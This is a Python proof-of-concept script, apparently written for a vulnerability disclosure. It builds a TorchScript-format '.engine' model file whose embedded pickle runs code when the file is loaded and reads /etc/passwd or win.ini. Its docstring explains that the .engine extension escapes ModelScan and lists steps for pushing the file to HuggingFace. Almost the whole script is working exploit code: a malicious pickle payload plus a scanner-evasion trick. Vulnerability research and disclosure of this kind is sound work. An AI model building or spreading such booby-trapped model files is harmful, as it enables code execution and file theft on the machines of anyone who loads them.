#!/usr/bin/env python3
"""
Creates the PoC model file: malicious_model.engine

This is the file you upload to HuggingFace.

What it does:
    A file named malicious_model.engine that is a valid TorchScript ZIP
    archive (the format torch_tensorrt uses to save compiled TRT engines).
    Internally it contains a malicious pickle payload in archive/data.pkl.

    When loaded with any of the standard TensorRT Python loading paths:
        torch.load("malicious_model.engine")
        torch.jit.load("malicious_model.engine")
        torch_tensorrt.load("malicious_model.engine")

    ...the pickle executes and reads sensitive files at load time.

Why it evades ModelScan:
    ModelScan's supported extensions (from settings.py):
        .pb .h5 .keras .npy .bin .pt .pth .ckpt .pkl .pickle .joblib .dill .dat .data

    .engine and .trt are completely absent.
    ModelScan returns "SCAN_NOT_SUPPORTED" — the file is never inspected.

This is a DUAL vulnerability:
    1. Scanner gap:   .engine / .trt are not scanned at all by ModelScan.
    2. Format vector: TorchScript ZIP format used by torch_tensorrt embeds
                      pickle streams (archive/data.pkl) in .engine files —
                      the same ACE surface as .pt files, with a different
                      extension that bypasses the scanner entirely.

Upload to HuggingFace:
    1. Run this script  ->  produces malicious_model.engine
    2. Push to HF repo
    3. Paste the URL in the submission form
"""
import pickle
import io
import os
import sys
import struct
import zipfile


# ─── Malicious payload: read sensitive file via io.FileIO ────────────────────
# Uses io.FileIO (not builtins.open) to stay clean even if ModelScan were
# ever to scan this file.
class EvadingPayload:
    """
    Reads C:\\Windows\\win.ini (Windows) or /etc/passwd (Linux) at load time.
    Packaged as a TorchScript-compatible pickle stream inside a .engine ZIP.
    """
    def __reduce__(self):
        target = "C:\\Windows\\win.ini" if sys.platform == "win32" else "/etc/passwd"
        return (io.FileIO, (target,))


# ─── Build a minimal TorchScript ZIP (.engine) ───────────────────────────────
#
# torch.jit.load() expects a ZIP archive named "archive" at the root,
# with the primary pickle at archive/data.pkl.
# This is the exact format torch_tensorrt uses when saving with
# output_format="torchscript".
#
# ZIP layout:
#   archive/data.pkl      <- the payload pickle
#   archive/version       <- TorchScript format version marker
#
def build_torchscript_engine_zip(payload_obj) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        # Payload pickle
        payload_bytes = pickle.dumps(payload_obj, protocol=4)
        zf.writestr("archive/data.pkl", payload_bytes)

        # TorchScript version marker (value "3" used by recent torch versions)
        zf.writestr("archive/version", b"3")

        # Minimal constants record expected by torch.jit.load
        zf.writestr("archive/constants.pkl", pickle.dumps((), protocol=2))

    return buf.getvalue()


# ─── Write the .engine file ───────────────────────────────────────────────────
output_file = "malicious_model.engine"
engine_bytes = build_torchscript_engine_zip(EvadingPayload())

with open(output_file, "wb") as f:
    f.write(engine_bytes)

print(f"[+] Created: {output_file!r}  ({os.path.getsize(output_file)} bytes)")
print(f"[+] Internal ZIP layout: archive/data.pkl (TorchScript format)")
print()
print("Verify ZIP structure:")
with zipfile.ZipFile(output_file, "r") as z:
    for name in z.namelist():
        info = z.getinfo(name)
        print(f"  {name}  ({info.file_size} bytes)")

print()
print("To reproduce:")
print("  python reproduce.py")